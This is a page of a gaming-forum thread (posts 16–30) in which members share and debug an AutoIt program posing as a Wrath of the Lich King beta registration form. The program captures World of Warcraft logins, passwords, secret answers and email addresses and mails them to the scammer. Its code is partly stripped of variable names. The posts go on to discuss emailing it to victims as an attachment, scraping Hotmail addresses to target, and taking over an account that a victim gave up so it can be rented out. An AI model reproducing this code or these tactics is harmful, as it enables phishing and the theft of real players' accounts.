Autoit WotLK Scam Fixed and reloaded! menu
100% Up to 1000$
4.9/5
150% Up to 200$ & 20 Freespins
4.8/5
Up to 1 BTC
4.9/5
20% Cashback
4.8/5
Up to 5 BTC
4.8/5
100% Up to 1 BTC
4.7/5
Up to 5 BTC
4.7/5
110% Up to 1 BTC
4.6/5

User Tag List

Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 38
  1. #16
    prutte's Avatar Member
    Reputation
    3
    Join Date
    Oct 2007
    Posts
    23
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Autoit WotLK Scam Fixed and reloaded!
    Originally Posted by secretguy View Post
    English code, which works:
    Code:
    #include 
    #Include 
    
    MsgBox( 0, "WotLK Beta Registration", "Please use a valid and active World of Warcraft account to register.")
    
    Func _INetSmtpMailCom(, , , ,  = "",  = "",  = "",  = "",  = "",  = "",  = "",=465, =1)
         = ObjCreate("CDO.Message")
        .From = '"' &  & '" <' &  & '>'
        .To = 
        Local  = 0
        Local  = ""
        If  <> "" Then .Cc = 
        If  <> "" Then .Bcc = 
        .Subject = 
        If StringInStr(,"<") and StringInStr(,">") Then
            .HTMLBody = 
        Else
            .Textbody =  & @CRLF
        EndIf
        If  <> "" Then
            Local  = StringSplit(, ";")
            For  = 1 To 
                 = _PathFull ()
                If FileExists() Then
                    .AddAttachment ()
                Else
                     =  & @lf & 'File not found to attach: ' & 
                    SetError(1)
                    return 0
                EndIf
            Next
        EndIf
        .Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusing") = 2
        .Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserver") = 
        .Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpserverport") = 
    ;Authenticated SMTP
        If  <> "" Then
            .Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpauthenticate") = 1
            .Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendusername") = 
            .Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/sendpassword") = 
        EndIf
        If  Then
            .Configuration.Fields.Item ("http://schemas.microsoft.com/cdo/configuration/smtpusessl") = True
        EndIf
    ;Update settings
        .Configuration.Fields.Update
    ; Sent the Message
        .Send
        if @error then
            SetError(2)
            return 
        EndIf
    EndFunc ;==>_INetSmtpMailCom
    ;
    ;
    ; Com Error Handler
    Func MyErrFunc()
         = Hex(.number, 8)
         = 
         = StringStripWS(.description,3)
        ConsoleWrite("### COM Error !  Number: " &  & "   ScriptLine: " & .scriptline & "   Description:" &  & @LF)
        SetError(1); something to check for when this function returns
        Return
    EndFunc ;==>MyErrFunc
    
    GuiCreate("Wrath of the Lich King - Beta Account Registration", 640,487, -1, -1, -1,  )
    GuiCtrlCreatePic("Library.dll",0,0,640,487)
    GuiCtrlSetState(-1,)
    
    =GUICtrlCreateInput ("", 260,220,150,20,)
    =GUICtrlCreateInput ("", 260,270,150,20,+)
    
    ; BUTTON
     = GuiCtrlCreateButton("Login", 255,305,70,20)
     = GuiCtrlCreateButton("Cancel", 345,305,70,20)
    
    ; GUI MESSAGE LOOP
    GuiSetState()
    
    While 1
         = GUIGetMsg()
        Select
            Case  = 
                ExitLoop
            Case  = 
                 = GUICtrlRead()
                 = GUICtrlRead()
                 = InputBox("Secret Answer", "Please type in your secret question answer.", "")
                 = InputBox("E-mail", "Please type in your e-mail address registered to your account.", "")
                 = "Accountname: " & @CRLF  &   & @CRLF  & "Password:" & @CRLF  &  & @CRLF  &"Antwort:" & @CRLF  & 
                 = _INetSmtpMailCom("smtp.gmail.com", , "youremail", "youremail", "WoWAccount", , "", "", "", "emailusername", "emailpass", 465, 1)
                MsgBox( 0, "Registration sucessful", "When the Wrath of the Lich King beta starts, you will receive a beta key with which you can activate your beta account. Repeated filling of the registration has no more effect.")
                ExitLoop
            Case  = 
                ExitLoop
        EndSelect
    WEnd
    Btw, this code also includes asking for the account holders email address (sometimes the account holder has the same password for the email = free account)

    You can remove this feature by removing:
    = InputBox("E-mail", "Please type in your e-mail address registered to your account.", "")

    and

    & @CRLF &"Email:" & @CRLF &

    Also improved the grammar a little bit - Enjoy.

    i'm new to this whole scamming thing. the original code (changed to gmail and all that) worked fine

    but if i use the code you made i get an error

    Line-1:

    Error: Expected a variable in user function call.

    Autoit WotLK Scam Fixed and reloaded!
  2. #17
    sheepking's Avatar Banned
    Reputation
    52
    Join Date
    Nov 2007
    Posts
    677
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    OK but I used this together with the .dll... but now I have another Error:


    Code:
    Line-1:
    
    
    Error:Expected a variable in user function call.
    
    __________________
    |                              |
    |             OK             |
    |_________________|
    plz help

  3. #18
    vulcan1909's Avatar Member
    Reputation
    1
    Join Date
    Jul 2006
    Posts
    19
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    hmmmm fake mailer isn't sending the emails when i attach things..... any ideas? (im testing by sending to myself)

  4. #19
    secretguy's Avatar Member
    Reputation
    6
    Join Date
    Oct 2006
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by vulcan1909 View Post
    hmmmm fake mailer isn't sending the emails when i attach things..... any ideas? (im testing by sending to myself)
    Same problem, create an account somewhere which allows hotlinking and link to that in the e-mail. Those people who knows that they shouldn't open the attachment doesn't click the link and it works the other way around.

  5. #20
    xdarkghostx's Avatar Member
    Reputation
    13
    Join Date
    Feb 2008
    Posts
    187
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    where are you guys sending the emails to??? i have an alt email at hotmail.com and when i send it there it takes less then a minute to arrive.

    anyway has anyone got past this problem because i have encounter a new problem but im pretty sure its easy to fix

    the prob- i send the email to my alt email account from the fake mailer. when it arrives i open it up. thinking to myself OMG WotLK beta <<
    im pretty sure this is an easy fix and i think it has to do with the html code that links the page with the attached archive. Anyone have a fix for this

  6. #21
    Parog's Avatar Kitsune Da-O! M.L.G. CoreCoins Purchaser Authenticator enabled
    Reputation
    1528
    Join Date
    May 2007
    Posts
    3,160
    Thanks G/R
    540/266
    Trade Feedback
    20 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by xdarkghostx View Post
    where are you guys sending the emails to??? i have an alt email at hotmail.com and when i send it there it takes less then a minute to arrive.

    anyway has anyone got past this problem because i have encounter a new problem but im pretty sure its easy to fix

    the prob- i send the email to my alt email account from the fake mailer. when it arrives i open it up. thinking to myself OMG WotLK beta <<
    im pretty sure this is an easy fix and i think it has to do with the html code that links the page with the attached archive. Anyone have a fix for this


    What do you mean it takes you to the signup link? this is a program, not a link o.O


    I've been informed that Gmail doesnt like the zip attachement =/ so we're SOL with Gmail users ( 1 out of 50 people use gmail ) other people use hotmail, which is fine.

    IF YOU DO want to send it to Gmail ( thank to vulcan1909 for this information ) you will have to put it in a .rar ( winrar ) and then you will be able to send it.
    Last edited by Parog; 02-16-2008 at 06:13 PM.
    What's a Parog?
    Looking for competitive Valorant team!

  7. #22
    xdarkghostx's Avatar Member
    Reputation
    13
    Join Date
    Feb 2008
    Posts
    187
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by fuzzayboy View Post
    What do you mean it takes you to the signup link? this is a program, not a link o.O


    I've been informed that Gmail doesnt like the zip attachement =/ so we're SOL with Gmail users ( 1 out of 50 people use gmail ) other people use hotmail, which is fine.

    IF YOU DO want to send it to Gmail ( thank to vulcan1909 for this information ) you will have to put it in a .rar ( winrar ) and then you will be able to send it.

    i know that its a program i thought that when they clicked the link on the html page it is suppose to open up the program??? if this is whats suppose to happen that doesnt happen for me.

    and also the easiest way to find hotmail emails is go to markeedragon.com and go to the forum search bar and make it search for @hotmail.com there is a ton of emails

  8. #23
    Parog's Avatar Kitsune Da-O! M.L.G. CoreCoins Purchaser Authenticator enabled
    Reputation
    1528
    Join Date
    May 2007
    Posts
    3,160
    Thanks G/R
    540/266
    Trade Feedback
    20 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    /facepalm

    /fail

    You're attaching something with the e-mail... a zip file with the Dll and the Exe.

    The e-mail is just informational, and so get the victim's trust. they will need to open the zip, and execute the Exe.
    What's a Parog?
    Looking for competitive Valorant team!

  9. #24
    xdarkghostx's Avatar Member
    Reputation
    13
    Join Date
    Feb 2008
    Posts
    187
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    o ok hmmmm thats what was wrong hey fuzz im gonna check some html codes to see if i can get it to open when they click the link because i think they wont believe it when they see the links dont go to anything if we can get it so when they click that link it opens the packages that would work out perfectly

  10. #25
    secretguy's Avatar Member
    Reputation
    6
    Join Date
    Oct 2006
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by xdarkghostx View Post
    o ok hmmmm thats what was wrong hey fuzz im gonna check some html codes to see if i can get it to open when they click the link because i think they wont believe it when they see the links dont go to anything if we can get it so when they click that link it opens the packages that would work out perfectly
    That would definitely NOT work -- how would you react if something suddenly popped up on your computer? I know how I would react: close it immediatly, as I would presume it's probably spam, spyware, virus, malware, etc. - also I highly doubt that you would be able to program it in a way so Hotmail allows the file to be opened immediatly when you open the e-mail.

  11. #26
    Parog's Avatar Kitsune Da-O! M.L.G. CoreCoins Purchaser Authenticator enabled
    Reputation
    1528
    Join Date
    May 2007
    Posts
    3,160
    Thanks G/R
    540/266
    Trade Feedback
    20 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by xdarkghostx View Post
    o ok hmmmm thats what was wrong hey fuzz im gonna check some html codes to see if i can get it to open when they click the link because i think they wont believe it when they see the links dont go to anything if we can get it so when they click that link it opens the packages that would work out perfectly
    You could upload it somewhere, and make something in javascript so that it prompts for the download as they click, but then you wouldn't need the attachment... but then again, it would reveal the download location, which wouldn't be any of blizzard's website... let me know if you get this figure out.

    Wouldnt be in html though, it would be javascript.
    What's a Parog?
    Looking for competitive Valorant team!

  12. #27
    Zingo's Avatar Member
    Reputation
    1
    Join Date
    Dec 2007
    Posts
    21
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    (Before flaming my leecher status, more people than me will find the answer useful!)

    When I compile the script, I get an error saying

    Line -1:

    Error: Expected a variable in user function call.
    So, what to do?

  13. #28
    Parog's Avatar Kitsune Da-O! M.L.G. CoreCoins Purchaser Authenticator enabled
    Reputation
    1528
    Join Date
    May 2007
    Posts
    3,160
    Thanks G/R
    540/266
    Trade Feedback
    20 (100%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    use the link from the first post, get the script from there, dont change ANYTHING, but the e-mail and password line. You wont get the error

    Use gmail for your needs too, turns out autoit likes it
    What's a Parog?
    Looking for competitive Valorant team!

  14. #29
    xdarkghostx's Avatar Member
    Reputation
    13
    Join Date
    Feb 2008
    Posts
    187
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    well i got everything figured out and i sent out about 40 emails last night i woke up this morning an to my suprise some noob acutally fell for he has a lvl 70 and a lvl 60. the problem is i dont know where to go from here i want to take full control of the account so i can rent it out, but not sure what i should do to take full control of the account.

  15. #30
    secretguy's Avatar Member
    Reputation
    6
    Join Date
    Oct 2006
    Posts
    16
    Thanks G/R
    0/0
    Trade Feedback
    0 (0%)
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)
    Originally Posted by fuzzayboy View Post
    You could upload it somewhere, and make something in javascript so that it prompts for the download as they click, but then you wouldn't need the attachment... but then again, it would reveal the download location, which wouldn't be any of blizzard's website... let me know if you get this figure out.

    Wouldnt be in html though, it would be javascript.
    I tried making a javascript download thingy, it works with GMail, but it doesn't work with hotmail, and that's kind of a problem since a LOT of Europeans uses Hotmail (compared to the US, where there's more Yahoo users).

Page 2 of 3 FirstFirst 123 LastLast
All times are GMT -5. The time now is 04:13 AM. Powered by vBulletin® Version 4.2.3
Copyright © 2025 vBulletin Solutions, Inc. All rights reserved. User Alert System provided by Advanced User Tagging (Pro) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Google Authenticator verification provided by Two-Factor Authentication (Free) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.
Digital Point modules: Sphinx-based search